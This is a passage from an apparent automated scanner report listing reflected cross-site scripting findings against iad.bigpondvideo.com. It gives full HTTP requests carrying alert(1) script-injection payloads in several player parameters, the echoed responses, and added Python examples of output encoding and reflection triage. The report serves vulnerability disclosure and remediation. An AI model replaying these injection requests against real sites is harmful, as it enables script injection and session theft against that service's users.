GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=2725512c</script><script>alert(1)</script>f9052c80859&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:14:23 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8843

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
tf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=2725512c</script><script>alert(1)</script>f9052c80859&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index
...[SNIP]...

2.549. http://iad.bigpondvideo.com/indexInfinityPlayer.php [height parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the height request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f301</script><script>alert(1)</script>9ee1b4dec9 was submitted in the height parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=2722f301</script><script>alert(1)</script>9ee1b4dec9&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:14:18 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8826

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
xOf("macintosh") != -1 || ua.indexOf("mac os x") != -1) ? "MacOs" : "Windows";
var rand                    = 1;
var totalItemCount            = (os != 'MacOs') ? 3 : 7;
var videoWidth                = "346";
var videoHeight                = "2722f301</script><script>alert(1)</script>9ee1b4dec9";
var windowLess                = (1 == 1) ? true : false;
var adMessage                = "";


if(controlsType == 'external')
   totalItemCount--;


function itemLoaded(){
   loadedItemCount++;
   if(loadedItemCount ==
...[SNIP]...

2.550. http://iad.bigpondvideo.com/indexInfinityPlayer.php [height parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the height request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 83e38%3balert(1)//66ff03f0f1a was submitted in the height parameter. This input was echoed as 83e38;alert(1)//66ff03f0f1a in the application's response. Note that in the response shown below the value lands inside the argument list of an AC_FL_RunContent(...) call, where the injected semicolon leaves the call unterminated; this exact payload therefore breaks the enclosing script block with a syntax error instead of executing. The injection point itself is real (an unquoted JavaScript expression with no encoding applied), but confirming execution requires a payload that keeps the enclosing call syntactically valid.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=27283e38%3balert(1)//66ff03f0f1a&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:14:24 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8740

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...

           AC_FL_RunContent(    'id','objFlashPlayerTrans',
                               'codebase','http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0',
                               'width',346,
                               'height',27283e38;alert(1)//66ff03f0f1a,
                               'align','left',
                               'src','App/InfinityPlayer/Flash/flash_overlay?rand=1',
                               'quality','high',
                               'allowscriptaccess','sameDomain',
                               'allowfullscreen','false',
           
...[SNIP]...
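The findings above share one root cause: player settings are written into the page without output encoding matched to where they land. The following Python is an added example written for this page (the site runs PHP, and none of this is the application's or the scanner's code). It renders the payloads from 2.546, 2.547 and 2.550 through a hypothetical stand-in for the template, once unprotected and once with context-specific encoding, and counts the script elements a browser would see. The render_* functions, the variable names and the markup fragments are constructed for the example; the three payload strings are copied from the report.

```python
import html
import json
from html.parser import HTMLParser

# Payloads copied from findings 2.546, 2.547 and 2.550 above; the response
# fragments they are rendered into below are constructed for this example.
JS_STRING_PAYLOAD = "17657f</script><script>alert(1)</script>6330f087c0e"
ATTR_PAYLOAD = '30e71"><script>alert(1)</script>48343e38125'
NUMBER_PAYLOAD = "27283e38;alert(1)//66ff03f0f1a"


class ScriptCounter(HTMLParser):
    """Counts <script> start tags the way a browser tokenizer sees them:
    script content is raw text that ends at the first </script>, no matter
    what the JavaScript around it looks like."""

    def __init__(self):
        super().__init__()
        self.scripts = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts += 1


def count_script_tags(markup: str) -> int:
    """Return how many script elements a browser would execute in MARKUP."""
    parser = ScriptCounter()
    parser.feed(markup)
    parser.close()
    return parser.scripts


# --- one encoder per output context ---------------------------------------

def js_string_literal(value: str) -> str:
    """Encode VALUE as a JavaScript string literal that is safe inside <script>.
    json.dumps handles quotes and backslashes; the extra replacements hide
    < > & (and the JS line terminators) from the HTML tokenizer, so the
    literal can never contain a working </script> sequence."""
    literal = json.dumps(value)
    for ch, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026"),
                    ("\u2028", "\\u2028"), ("\u2029", "\\u2029")):
        literal = literal.replace(ch, esc)
    return literal


def html_attr(value: str) -> str:
    """Encode VALUE for a double-quoted HTML attribute."""
    return html.escape(value, quote=True)


def js_number(value: str) -> str:
    """Allow-list a value that will be written as a bare JavaScript number.
    Anything that is not a plain base-10 integer raises ValueError."""
    return str(int(value, 10))


# --- the broken and the fixed rendering, side by side ---------------------

def addslashes(value: str) -> str:
    """SQL-style quote escaping, as seen in the 2.547 response. Backslash is
    not an escape character in HTML, so this is no defence there."""
    return (value.replace("\\", "\\\\")
                 .replace('"', '\\"')
                 .replace("'", "\\'"))


def render_vulnerable(full_screen: str, height: str) -> str:
    """Hypothetical stand-in for the player template: raw JS string, and an
    attribute protected only by addslashes()."""
    return (f'<script>var allowFullScreen = "{full_screen}";</script>\n'
            f'<div id="flashOverlayTrans" style="height:{addslashes(height)}px">'
            "</div>")


def render_fixed(full_screen: str, height: str) -> str:
    """Same template with context-specific encoding on every output."""
    return (f"<script>var allowFullScreen = {js_string_literal(full_screen)};"
            "</script>\n"
            f'<div id="flashOverlayTrans" style="height:{html_attr(height)}px">'
            "</div>")


if __name__ == "__main__":
    print("vulnerable:", count_script_tags(render_vulnerable(JS_STRING_PAYLOAD, ATTR_PAYLOAD)))  # 3
    print("fixed:     ", count_script_tags(render_fixed(JS_STRING_PAYLOAD, ATTR_PAYLOAD)))       # 1
    for candidate in ("272", NUMBER_PAYLOAD):
        try:
            print("height ->", js_number(candidate))
        except ValueError:
            print("height rejected:", candidate)
```

js_number is the appropriate fix for height, width and the 0/1 flags: validating against the expected type removes the output-encoding question altogether, and intval() or ctype_digit() in PHP do the same job. For values that really must be strings, json_encode() with JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT (PHP 5.3 and later) is the equivalent of js_string_literal, and htmlspecialchars() with ENT_QUOTES is the equivalent of html_attr.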

2.551. http://iad.bigpondvideo.com/indexInfinityPlayer.php [holdingImgDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the holdingImgDefault request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 35d54</script><script>alert(1)</script>c562e631428 was submitted in the holdingImgDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=135d54</script><script>alert(1)</script>c562e631428&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:12:35 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8677

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=135d54</script><script>alert(1)</script>c562e631428&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId
...[SNIP]...

2.552. http://iad.bigpondvideo.com/indexInfinityPlayer.php [invoke parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the invoke request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70425</script><script>alert(1)</script>14ace4beeb4 was submitted in the invoke parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=070425</script><script>alert(1)</script>14ace4beeb4&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:15:19 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8677

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
eBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=070425</script><script>alert(1)</script>14ace4beeb4&domain=iad.bigpondvideo.com&location=http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html&randId=43&os=MacOs&showOverlays=1&debug=0'+"&screenWidth="+screen.width+"&screenHeight="+scr
...[SNIP]...
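To triage a report like this one, in which the same parameter appears under several findings that differ only in the context of the reflection (compare 2.547, 2.548, 2.549 and 2.550 for height), it helps to reproduce the scanner's classification by hand. The Python below is an added example and not part of the original report or of the scanner: it takes a response body and the submitted canary and states whether the canary landed in HTML text, an HTML attribute or JavaScript, and how it is quoted, by scanning only the text before the reflection. The sample bodies are constructed from the response snippets shown in 2.546, 2.547, 2.550 and 2.552 (the variable name flashVars in the 2.552 sample is invented, since that line is cut off in the report); the quote tracking is a heuristic that does not model JavaScript comments, regular-expression or template literals.

```python
# Response fragments modelled on the findings above (constructed for this
# example from the snippets shown; the name flashVars is invented), each
# paired with the canary the scanner submitted.
SAMPLES = {
    "2.546": (  # double-quoted JavaScript string
        '<script type="text/javascript">\n'
        'var ua = navigator.userAgent.toLowerCase();\n'
        'var allowFullScreen = "17657f</script><script>alert(1)</script>6330f087c0e";\n'
        "</script>",
        "7657f</script><script>alert(1)</script>6330f087c0e"),
    "2.547": (  # double-quoted HTML attribute, quote backslash-escaped
        '<div id="flashOverlayTrans" style="width:346px; '
        'height:27230e71\\"><script>alert(1)</script>48343e38125px;text-align:left">',
        '30e71\\"><script>alert(1)</script>48343e38125'),
    "2.550": (  # unquoted argument inside a function call
        "<script>\nAC_FL_RunContent('id','objFlashPlayerTrans',\n"
        "'width',346,\n'height',27283e38;alert(1)//66ff03f0f1a,\n"
        "'align','left');\n</script>",
        "83e38;alert(1)//66ff03f0f1a"),
    "2.552": (  # single-quoted JavaScript string holding the query string
        "<script>\nvar flashVars = 'isSecure=0&invoke=070425</script><script>alert(1)</script>"
        "14ace4beeb4&domain=iad.bigpondvideo.com&debug=0'+\"&screenWidth=\"+screen.width;\n"
        "</script>",
        "70425</script><script>alert(1)</script>14ace4beeb4"),
}


def _js_quote_state(code: str) -> str:
    """Track JavaScript string quoting up to the reflection point.
    Heuristic: honours backslash escapes, ignores comments, regex and
    template literals."""
    quote = None
    i = 0
    while i < len(code):
        ch = code[i]
        if quote:
            if ch == "\\":
                i += 1              # skip the escaped character
            elif ch == quote:
                quote = None
        elif ch in "'\"":
            quote = ch
        i += 1
    return {None: "unquoted expression", "'": "single-quoted string",
            '"': "double-quoted string"}[quote]


def _attr_quote_state(tag: str) -> str:
    """Track attribute quoting inside one start tag. HTML has no backslash
    escapes, which is exactly why the \\" in 2.547 did not help."""
    quote = None
    for ch in tag:
        if quote:
            if ch == quote:
                quote = None
        elif ch in "'\"":
            quote = ch
    return {None: "unquoted value or tag body", "'": "single-quoted value",
            '"': "double-quoted value"}[quote]


def classify_reflection(body: str, canary: str) -> str:
    """Report where CANARY first lands in BODY: html text, an HTML attribute
    (with its quoting), or JavaScript inside a script element (with its
    quoting). Only the text before the canary is examined, so the payload's
    own quotes and tags do not disturb the answer."""
    idx = body.find(canary)
    if idx < 0:
        return "not reflected"
    before = body[:idx]
    lower = before.lower()
    open_at, close_at = lower.rfind("<script"), lower.rfind("</script")
    if open_at > close_at:                      # inside a script element
        end = before.find(">", open_at)
        if end < 0:                             # still inside <script ...>
            return "html attribute, " + _attr_quote_state(before[open_at:])
        return "javascript, " + _js_quote_state(before[end + 1:])
    lt, gt = before.rfind("<"), before.rfind(">")
    if lt > gt:                                 # inside some other start tag
        return "html attribute, " + _attr_quote_state(before[lt:])
    return "html text"


def triage(samples=SAMPLES) -> dict:
    """Classify every (body, canary) pair; returns {finding: context}."""
    return {name: classify_reflection(body, canary)
            for name, (body, canary) in samples.items()}


if __name__ == "__main__":
    for finding, context in triage().items():
        print(f"{finding}: {context}")
```

The classifier deliberately looks only at what precedes the canary: that is what decides which characters the payload must contain to break out (a quote and > for an attribute, </script> or a quote for a JavaScript string, a statement terminator for an unquoted expression), and it is why four findings against one parameter are four distinct fixes rather than duplicates.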

2.553. http://iad.bigpondvideo.com/indexInfinityPlayer.php [isSecure parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the isSecure request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e26d2</script><script>alert(1)</script>afa0f2a8cbc was submitted in the isSecure parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0e26d2</script><script>alert(1)</script>afa0f2a8cbc&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:15:14 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8677

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0e26d2</script><script>alert(1)</script>afa0f2a8cbc&invoke=0&domain=iad.bigpondvideo.com&location=http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html&randId=43&os=MacOs&showOverlays=1&debug=0'+"&screenWidth="+screen.width+"&screenHei
...[SNIP]...

2.554. http://iad.bigpondvideo.com/indexInfinityPlayer.php [live parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the live request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca5a4</script><script>alert(1)</script>48dcf77890a was submitted in the live parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0ca5a4</script><script>alert(1)</script>48dcf77890a&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:12:50 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8677

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
